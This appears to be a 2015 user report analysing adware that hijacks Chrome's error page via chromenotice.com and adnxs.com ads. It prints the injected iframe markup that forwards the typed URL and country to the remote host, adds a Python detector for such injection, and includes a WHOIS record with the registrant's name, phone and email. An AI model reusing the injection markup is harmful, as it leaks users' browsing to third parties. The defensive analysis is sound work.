Google Chrome error page hijacked by malware "www.chromenotice.com" and "adnxs.com"
Adware Found: 2015 May ~ June
Adware Cleanup Status: Not resolved yet.
ChromeNotice malware/adware reproduction scenario:
(1) Type "About:config" into the URL bar (or anything else that makes you see the Chrome error page)
(2) The adware hijacks you to "www.chromenotice.com/error.html (DO NOT FOLLOW)"
(3) The page then forcibly shows "adnxs.com (DO NOT FOLLOW)" ads
(4) Tried the following procedures, no luck:
@ Chrome Reset Settings => Looks futile.
@ ADWCleaner.com 2015/May => Can't detect or remove it (ver 4.2.06)
@ AVG 2015 2015/Jun => Can't detect or remove it (ver 2015/06/03)
@ Microsoft MRT 2014/May => Can't detect or remove it (ver 205/05/13)
@ Spybot Search & Destroy => Can't detect or remove it (ver 2.2)
@ Uninstall Chrome to fix this issue
===> YES, it works, as long as you've done the above actions and found all clean.
Your "view page source" in Chrome will also be hijacked by this adware/malware!
The adware redirect page looks like this, with chromenotice.com/error.html inside an iframe.
Code:
<html i18n-values="dir:textdirection;lang:language" dir="ltr" lang="en">
<head></head>
<body id="t" i18n-values=".style.fontFamily:fontfamily;.style.fontSize:fontsize"
jstcache="0" class="neterror" style="font-family: 'Segoe UI', Tahoma, sans-serif;
font-size: 75%; height: 100%; width: 100%; margin: 0px; text-align: center; overflow: hidden;">
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no" src="http://www.chromenotice.com/error.html?data={"h1":"This webpage is not available","msg":"The webpage at <strong jscontent=\"failedUrl\"></strong> might be temporarily down or it may have moved permanently to a new web address.","url":"chrome://config/","li":[],"source_data":{"details":"Details","errorCode":"ERR_INVALID_URL","fontfamily":"'Segoe UI', Tahoma, sans-serif","fontsize":"75%","heading":"This webpage is not available","hideDetails":"Hide details","iconClass":"icon-generic","language":"en","suggestions":[],"summary":{"failedUrl":"chrome://config/","hostName":"config","msg":"The webpage at <strong jscontent=\"failedUrl\"></strong> might be temporarily down or it may have moved permanently to a new web address.","productName":"Google Chrome"},"textdirection":"ltr","title":"chrome://config/ is not available"},"country":"tw"}" width="1920" height="739"></iframe></body></html>
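A check for this injection in a saved copy of the error page's source. This is an added example, not part of the original report. It assumes Chrome's built-in error page loads nothing over http/https; both sample pages are constructed, the hijacked one trimmed from the markup above.

```python
import re
from urllib.parse import urlparse

# Tolerant patterns: the hijacked page's markup is not well-formed (unescaped
# quotes inside src), so a strict parse would lose the rest of the attribute.
NETERROR_BODY = re.compile(r'<body\b[^>]*\bclass\s*=\s*["\'][^"\']*\bneterror\b', re.I)
REMOTE_SRC = re.compile(
    r'<(iframe|frame|script|embed|img)\b[^>]*?\bsrc\s*=\s*["\']?(https?://[^"\'\s>]+)',
    re.I)
PASSED_URL = re.compile(r'"url"\s*:\s*"([^"]*)"')


def audit_error_page(source):
    """Return remote resources embedded in a page styled as Chrome's error page."""
    findings = []
    if not NETERROR_BODY.search(source):
        return findings  # not an error page, so remote content proves nothing
    for m in REMOTE_SRC.finditer(source):
        url = urlparse(m.group(2))
        # The address the user typed travels in the JSON that follows the src URL.
        passed = PASSED_URL.search(source[m.end():m.end() + 4096])
        findings.append({
            "tag": m.group(1).lower(),
            "host": url.hostname,
            "path": url.path,
            "failed_url_sent": passed.group(1) if passed else None,
        })
    return findings


# Constructed samples (assumption: a clean error page has no http/https src).
HIJACKED = '''<body id="t" jstcache="0" class="neterror">
<iframe frameborder="no" scrolling="no" src="http://www.chromenotice.com/error.html?data={"h1":"This webpage is not available","url":"chrome://config/","country":"tw"}" width="1920" height="739"></iframe></body>'''
CLEAN = '<body id="t" class="neterror"><div>This webpage is not available</div></body>'

if __name__ == "__main__":
    for name, page in (("hijacked", HIJACKED), ("clean", CLEAN)):
        print(name, audit_error_page(page))
```

A non-empty result on an error page means the page was rewritten before display, and the failed_url_sent field shows that the address the user typed is handed to the remote host.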
"zhangxiaoyang@337.com" is also the owner of delta-homes.com
Code:
The email zhangxiaoyang@337.com is related to these domains :
>>> Last update of whois database: Wed, 03 Jun 2015 06:29:10 GMT <<<
Domain Name: CHROMENOTICE.COM
Registry Domain ID: 1919575232_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Update Date: 2015-04-14T01:33:33Z
Creation Date: 2015-04-14T01:33:33Z
Registrar Registration Expiration Date: 2016-04-14T01:33:33Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited
Registry Registrant ID:
Registrant Name: xianlin xie
Registrant Organization:
Registrant Street: UNIT 04 hongkong, hongkong 999077 Hong Kong
Registrant City: hongkong
Registrant State/Province: hongkong
Registrant Postal Code: 999077
Registrant Country: Hong Kong
Registrant Phone: +852.18610012110
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: zhangxiaoyang@337.com
Registry Admin ID:
Admin Name: xianlin xie
Admin Organization:
Admin Street: UNIT 04 hongkong, hongkong 999077 Hong Kong
Admin City: hongkong
Admin State/Province: hongkong
Admin Postal Code: 999077
Admin Country: Hong Kong
Admin Phone: +852.18610012110
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: zhangxiaoyang@337.com
Registry Tech ID:
Tech Name: xianlin xie
Tech Organization:
Tech Street: UNIT 04 hongkong, hongkong 999077 Hong Kong
Tech City: hongkong
Tech State/Province: hongkong
Tech Postal Code: 999077
Tech Country: Hong Kong
Tech Phone: +852.18610012110
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: zhangxiaoyang@337.com
Name Server: PDNS05.DOMAINCONTROL.COM
Name Server: PDNS06.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
More details about chromenotice.com
Code:
GET / HTTP/1.1
Host: www . chromenotice . com
Accept: */*
Server ngx_openresty is not blacklisted
Server: ngx_openresty
Date: Mon, 01 Jun 2015 04:56:56 GMT